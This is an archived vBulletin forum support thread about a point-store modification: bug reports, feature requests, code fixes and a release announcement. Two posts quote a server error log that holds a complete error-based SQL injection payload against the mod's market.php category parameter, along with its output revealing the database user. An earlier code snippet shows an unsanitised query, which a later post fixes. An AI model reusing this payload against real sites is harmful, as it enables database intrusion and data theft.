vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   Modification Graveyard (https://vborg.vbsupport.ru/forumdisplay.php?f=224)
-   -   Major Additions - Point Market System 3.1x (https://vborg.vbsupport.ru/showthread.php?t=232676)

Smak Runner 2K 05-11-2011 12:25 AM

Any advice for my issue?

monkeyboy1916 05-11-2011 03:16 AM

Quote:

Originally Posted by TheMayhem (Post 2194073)
I think that's cause how I am handling it with the form. I made some errors in how I stripped and add slashes. I'll try and apply a fix for the next release.

Thank you!

TheMayhem 05-11-2011 04:22 PM

A final gold version is going to be released within the next 36 hours.

BCP Hung 05-11-2011 04:42 PM

Quote:

Originally Posted by TheMayhem (Post 2194488)
A final gold version is going to be released within the next 36 hours.

Waiting for gold version, I like your mods !

monkeyboy1916 05-11-2011 09:41 PM

I feel bad for asking about another problem I might be having, but, well.. I'm mostly curious about how you prefer this functionality yourself.

For my setup, I use secondary usergroups to override some permissions, and for this mod, secondary usergroup settings don't seem to override the default for my regular members.

For example, for Contibutors to my forum, they'll get a discount, but they're only a secondary usergroup ontop of the default registered users group, and I'd like them to have a discount without having to switch everyone to primary usergroups.

Could it be possible for secondary usergroup permissions to override the primary for the Market?

DigitalDark 05-14-2011 08:12 AM

The Mayhem can you add an option to set max purchases per item? Example: I want that a user can change his name 1 time per month. Or, Buy a color name only 3 times per month...

It's possible?

It would be very interesting for prevent trolling actions, and take in care the value of points.

Thanks.

Muazam 05-15-2011 12:37 AM

Code:

Database error in vBulletin 4.1.3:

Invalid SQL:
SELECT * from market_items where `marketid` = 16 AND (SELECT 3794 FROM(SELECT COUNT(*),CONCAT(CHAR(58,119,114,108,58),(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32))),1,50)),CHAR(58,119,115,101,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a);

MySQL Error  : Duplicate entry ':wrl:root@localhost:wse:1' for key 1
Error Number  : 1062
Request Date  : Sunday, May 15th 2011 @ 03:22:53 AM
Error Date    : Sunday, May 15th 2011 @ 03:22:53 AM
Script        : /market.php?do=cat&id=16%20AND%20%28SELECT%203794%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C119%2C114%2C108%2C58%29%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2CCHAR%2832%29%29%29%2C1%2C50%29%29%2CCHAR%2858%2C119%2C115%2C101%2C58%29%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20information_schema.tables%20GROUP%20BY%20x%29a%29


This is bad right?

Successfulsteps 05-15-2011 06:10 AM

This is nice, but I'd like to add Bingo cards. I would really like it if they could pick from cards 1-200, with images. And then it send them a PM with the images of the cards they bought, 3 limited per game. And then when the supplies get low, we could load the images of cards #'s numbers used up. Is this possible?

Also, does this work in 4.1.3 release?

Smak Runner 2K 05-16-2011 06:40 PM

OK, well, I've asked for help twice and have been ignored. Can't get the navbar link to show up. Tried everything. Guess I'm not important enough to even get a nod an a "I'll look into it" or whatever. Thanks.

Pionex 05-18-2011 09:06 AM

when trying to use the lottery I receive this error:

Fatal error: Cannot use object of type mysqli_result as array in /home/admin/domains/mysite.com/public_html/pointmarket/gamble_access.php on line 213

janvm 05-18-2011 04:52 PM

Where can i find a table which shows me what have user buyed and where i can delete buyed items and more?

janvm 05-19-2011 01:53 PM

Also the Option how much pecent a usergrp gets discount does not function.

TheMayhem 05-19-2011 11:07 PM

Quote:

Originally Posted by Smak Runner 2K (Post 2196440)
OK, well, I've asked for help twice and have been ignored. Can't get the navbar link to show up. Tried everything. Guess I'm not important enough to even get a nod an a "I'll look into it" or whatever. Thanks.

I missed your post the first time, sorry. I thought about it and I am pretty sure that it is related to compatibility with another modification. Try disabling all other modifications and see if that allows for it to show up. Also make sure that you aren't using any customized templates related to the navbar &/or Point Market as that can throw it off. Finally, you must make sure your market settings has the navbar option enabled. Your the only person to say that it won't work for them that's why I'm thinking it's something directly related to your forum & hacks rather than an issue with the market.

Pionex 05-20-2011 12:51 AM

when trying to use the lottery system:

Fatal error: Cannot use object of type mysqli_result as array in /home/admin/domains/mysitecom/public_html/pointmarket/gamble_access.php on line 213

Smak Runner 2K 05-20-2011 01:19 AM

Got the navbar working (conflict) - Thanks for the advice. Sorry I got a little heated...Just frustrated man.

New issue. When someone tries to purchase a created gift, the following error message appears:

Warning: include_once([path]/pointmarket/gift_purchase.php) [function.include-once]: failed to open stream: No such file or directory in [path]/market.php on line 436

Warning: include_once() [function.include]: Failed opening '[path]/pointmarket/gift_purchase.php' for inclusion (include_path='.:/usr/local/php5/lib/php') in [path]/market.php on line 436

TheMayhem 05-20-2011 01:34 AM

Quote:

Originally Posted by Smak Runner 2K (Post 2196440)
OK, well, I've asked for help twice and have been ignored. Can't get the navbar link to show up. Tried everything. Guess I'm not important enough to even get a nod an a "I'll look into it" or whatever. Thanks.

Quote:

Originally Posted by Pionex (Post 2197812)
when trying to use the lottery system:

Fatal error: Cannot use object of type mysqli_result as array in /home/admin/domains/mysitecom/public_html/pointmarket/gamble_access.php on line 213

To fix this in Beta 4 or in gold do this:

Open gamble_access.php
Find
PHP Code:

// Assign Coupons    
    
$getcoupon $vbulletin->GPC['cid'];
    
$cid $db->query_read("SELECT * FROM " TABLE_PREFIX "market_coupons WHERE id ='$getcoupon'"); 

Change to:

PHP Code:

// Build Coupon
$getcouponid $vbulletin->input->clean_gpc('g''cid'TYPE_UINT);
if (
$getcouponid 0) {
$cid $vbulletin->db->fetch_array($vbulletin->db->query_read("SELECT * from " TABLE_PREFIX "market_coupons where id ='".addslashes($getcouponid)."'"));
} else {
$cid['id'] = 0;



Pionex 05-20-2011 01:44 AM

fixed-
Thank you.

Smak Runner 2K 05-20-2011 02:15 AM

Nevermind...downloaded new version. all fixed

TheMayhem 05-20-2011 02:22 AM

Quote:

Originally Posted by Smak Runner 2K (Post 2197840)
Nevermind...downloaded new version. all fixed

Which modification didn't it work with properly outta curiosity? That way I know for future issues with other members. And no biggy I know how frustrating it can be to have something not work the way it's supposed to... happens to me all the time when I code :P

Smak Runner 2K 05-20-2011 03:01 AM

Quote:

Originally Posted by TheMayhem (Post 2197841)
Which modification didn't it work with properly outta curiosity? That way I know for future issues with other members. And no biggy I know how frustrating it can be to have something not work the way it's supposed to... happens to me all the time when I code :P

Honestly I don't know, because I uninstalled everything - installed Point Market first, and then about 60% of what was running before after. I took the liberty to cut down on the crap.

TheMayhem 05-20-2011 04:09 AM

Official 3.1.0 Gold Post

I think I spent 9 months working on the 3.1x series and it feels great to finally make this post. Over the past half year and beyond, I've set out to create the most powerful point/store system that has ever been available at anytime during the existance of forum hacks. Based on your feedback as users of this modification, I finally feel that the Point Market is stable enough to be labled gold. What's gold? This is the finished product of what I wanted from the 3.1x series. I feel that the remaining bugs are minimal enough that no real big issues should exist.

I should first note that this upgrade IS REQUIRED!!! Any version before this (even the 3.0 series) needs to upgrade to this series. There is just too many features, changes, and tweaks over the history of the market for you not to upgrade. In addition in this final gold release, there was one major security fix that had to be addressed. Users NEED to upgrade to this version.

I want to thank all users for their patience. I can now resume scripting the 3.1x series with patches and new features. If you are interested in a branded free option, you are more then welcome to private message me for details.

~Brad

CardMafia 05-21-2011 08:41 PM

Uninstalled.

ESKORPION 05-23-2011 06:10 AM

Hello,

I have a problem and need your help. I have installed kbank and Point Market now but I don't know how make to work.

Thanks!

Kraxell 05-23-2011 02:53 PM

Uninstalled like Card+++++.

TheMayhem 05-23-2011 08:15 PM

Quote:

Originally Posted by ESKORPION (Post 2198978)
Hello,

I have a problem and need your help. I have installed kbank and Point Market now but I don't know how make to work.

Thanks!

You need to use the point field that kbank stores in the user table as the primary point field name within the Market settings. After that you should edit all usergroup permissions to enable it for whoever you want to be able to access the market. Then it will work.

Quote:

Originally Posted by Kraxell (Post 2199108)
Uninstalled like Card+++++.

I'm not really sure why you'd uninstall it. The absolute only thing different about this version is there is a copyright notice on the Point Market helping protect it. People were stealing the modification on other websites, claiming they created it, and allowing others to download it (sometimes charging them). I wasn't okay with that and it's very discouraging as a web developer. Plus I needed to find a way to allow me to not have to get a second job so I could still have time to work on this mod. Otherwise I was going to have to sell the modification and discontinue it :( It's still completely a full powered completeversion and I've kept my pledge that I always have about not going to a "lite" series like competitor modifications. Every feature that is on another site can be found here on vb.org :)

Cru_Jones83 05-24-2011 11:22 PM

Sorry, I looked a few pages back and didn't see an answer to this. Is this supported at all in 4.1.3?

Special Pages 05-24-2011 11:23 PM

I used to use this mod. This is a great one. Thanks!

CardMafia 05-24-2011 11:39 PM

Quote:

Originally Posted by TheMayhem (Post 2199234)
You need to use the point field that kbank stores in the user table as the primary point field name within the Market settings. After that you should edit all usergroup permissions to enable it for whoever you want to be able to access the market. Then it will work.



I'm not really sure why you'd uninstall it. The absolute only thing different about this version is there is a copyright notice on the Point Market helping protect it. People were stealing the modification on other websites, claiming they created it, and allowing others to download it (sometimes charging them). I wasn't okay with that and it's very discouraging as a web developer. Plus I needed to find a way to allow me to not have to get a second job so I could still have time to work on this mod. Otherwise I was going to have to sell the modification and discontinue it :( It's still completely a full powered completeversion and I've kept my pledge that I always have about not going to a "lite" series like competitor modifications. Every feature that is on another site can be found here on vb.org :)

I understand your position. It just seems to be a bit overboard imo. If I find myself looking to invest in a mod like this, I may reinstall and pay for the branding removal. Great mod though.

Muazam 05-24-2011 11:51 PM

It's not secure. Mysql Injections below:

Code:

Database error in vBulletin 4.1.3:

Invalid SQL:
SELECT * from market_items where `marketid` = 16 AND (SELECT 3794 FROM(SELECT COUNT(*),CONCAT(CHAR(58,119,114,108,58),(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32))),1,50)),CHAR(58,119,115,101,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a);

MySQL Error  : Duplicate entry ':wrl:root@localhost:wse:1' for key 1
Error Number  : 1062
Request Date  : Sunday, May 15th 2011 @ 03:22:53 AM
Error Date    : Sunday, May 15th 2011 @ 03:22:53 AM
Script        : /market.php?do=cat&id=16%20AND%20%28SELECT%203794%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C119%2C114%2C108%2C58%29%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2CCHAR%2832%29%29%29%2C1%2C50%29%29%2CCHAR%2858%2C119%2C115%2C101%2C58%29%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20information_schema.tables%20GROUP%20BY%20x%29a%29

This is not safe at all, I'm not sure what the code does. But it looks like its reading the account table? Please look into it.

Will.Spencer 05-25-2011 01:29 AM

When we edit the store item there is an "Instructions" textarea, saying: "This is the instructions that the users will follow in order to enable the market item."

The trouble is, when we enter anything there it doesn't seem to actually display anywhere in the front-end, not on the page of the item, nor anywhere after the actual purchase. What's up with that?

Thanks

TheMayhem 05-25-2011 08:34 PM

Quote:

Originally Posted by Card+++++ (Post 2199623)
I understand your position. It just seems to be a bit overboard imo. If I find myself looking to invest in a mod like this, I may reinstall and pay for the branding removal. Great mod though.

Trust me it's very discouraging for me as the developer to go out and find other non sanctioned vb sites where they were charging people for my mod or taking credit as creating the modification. This was the only way I could figure out how to limit there stealing of it or at least be able to track them if they purchase a branding removal version.

Quote:

Originally Posted by Muazam (Post 2199627)
It's not secure. Mysql Injections below:

Code:

Database error in vBulletin 4.1.3:

Invalid SQL:
SELECT * from market_items where `marketid` = 16 AND (SELECT 3794 FROM(SELECT COUNT(*),CONCAT(CHAR(58,119,114,108,58),(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32))),1,50)),CHAR(58,119,115,101,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a);

MySQL Error  : Duplicate entry ':wrl:root@localhost:wse:1' for key 1
Error Number  : 1062
Request Date  : Sunday, May 15th 2011 @ 03:22:53 AM
Error Date    : Sunday, May 15th 2011 @ 03:22:53 AM
Script        : /market.php?do=cat&id=16%20AND%20%28SELECT%203794%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C119%2C114%2C108%2C58%29%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2CCHAR%2832%29%29%29%2C1%2C50%29%29%2CCHAR%2858%2C119%2C115%2C101%2C58%29%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20information_schema.tables%20GROUP%20BY%20x%29a%29

This is not safe at all, I'm not sure what the code does. But it looks like its reading the account table? Please look into it.

Your using Point Market version 3.0.1. Please upgrade to 3.1.0 and that will be fixed :)

Kraxell 05-25-2011 10:18 PM

Quote:

People were stealing the modification on other websites, claiming they created it, and allowing others to download it (sometimes charging them). I wasn't okay with that and it's very discouraging as a web developer. Plus I needed to find a way to allow me to not have to get a second job so I could still have time to work on this mod. Otherwise I was going to have to sell the modification and discontinue it It's still completely a full powered completeversion and I've kept my pledge that I always have about not going to a "lite" series like competitor modifications. Every feature that is on another site can be found here on vb.org
The little note at the left-menu was not a problem but such a long text under the market is not fine. sure, i can delete it by myself in the market/bank.php but i know how many work such a hack cost.

TheMayhem 05-26-2011 07:30 PM

Quote:

Originally Posted by Kraxell (Post 2199986)
The little note at the left-menu was not a problem but such a long text under the market is not fine. sure, i can delete it by myself in the market/bank.php but i know how many work such a hack cost.

I'm always open to you guys coming up with a more appealing/visually pretty copyright notice if you can think of one I'll implement it as I always try to follow users advise with this mod and always have.




ANDDDDD.... since there has been relatively few bugs I am going to start working on new versions/features. I want to start adding more Forum Market Items so once again I am taking suggestions on what you guys would like to see :)

Kraxell 05-26-2011 07:42 PM

installed it again. is it allow to shorten the long notice to one row?

fly 05-26-2011 08:05 PM

Quote:

Originally Posted by fly (Post 2163165)
And after this, I'll stop spamming - I swear.

suggestion: Ability to change a thread title

Here's a suggestion for a new item!

TheMayhem 05-26-2011 10:18 PM

Quote:

Originally Posted by Kraxell (Post 2200329)
installed it again. is it allow to shorten the long notice to one row?

Yeah if I can figure out how to reword everything into a one line notice. I have to think a bit before I release 3.1.1.

TheMayhem 05-30-2011 08:39 PM

I am letting people know that I completed 3.1.1 and will release it on June 8th. 3.1.1 features a new gift feature that allows for detailed information through the postbit (A clickable popup link) that shows information released to what a user has earned via gifts.

I've already begun working on 3.1.2, which I am very excited to say will feature these new forum market items:
Version 3.1.2 is coming out this week is a major forum item release. There are 7 New forum Market items:
- Upload Gift
- Change Thread Name
- Thread Glow
- Username Rainbow
- Usertitle Rainbow
- Upload Profile Picture
- Upload Signature Image

That will be released here on vb.org at the end of June. I might add some new lottery features in there too if I get time :)

augrunt 06-04-2011 07:22 AM

I don't think the Point Bank System (interest) is working... when I attempt to run the CRON manually via the Scheduled Tasks Manager, it throws up a lot of errors about not having the username/password to execute the query.

This also includes a few other scheduled tasks. They don't seem to use the vBulletin object to do the queries. $vb->query (or something like that) and just use mysql_query() without an actual connection to the database being established before it. Not from what I can see anyway.

BayLee2 06-04-2011 09:46 AM

Installed and loving it~!!!

fly 06-04-2011 07:51 PM

Quote:

Originally Posted by TheMayhem (Post 2201826)
I am letting people know that I completed 3.1.1 and will release it on June 8th. 3.1.1 features a new gift feature that allows for detailed information through the postbit (A clickable popup link) that shows information released to what a user has earned via gifts.

I've already begun working on 3.1.2, which I am very excited to say will feature these new forum market items:
Version 3.1.2 is coming out this week is a major forum item release. There are 7 New forum Market items:
- Upload Gift
- Change Thread Name
- Thread Glow
- Username Rainbow
- Usertitle Rainbow
- Upload Profile Picture
- Upload Signature Image

That will be released here on vb.org at the end of June. I might add some new lottery features in there too if I get time :)

Thread title change?!?!?! I love ya!


All times are GMT. The time now is 11:12 AM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.06386 seconds
  • Memory Usage 1,865KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (3)bbcode_code_printable
  • (2)bbcode_php_printable
  • (17)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (4)pagenav_pagelink
  • (1)pagenav_pagelinkrel
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (40)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 

Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • pagenav_page
  • pagenav_complete
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete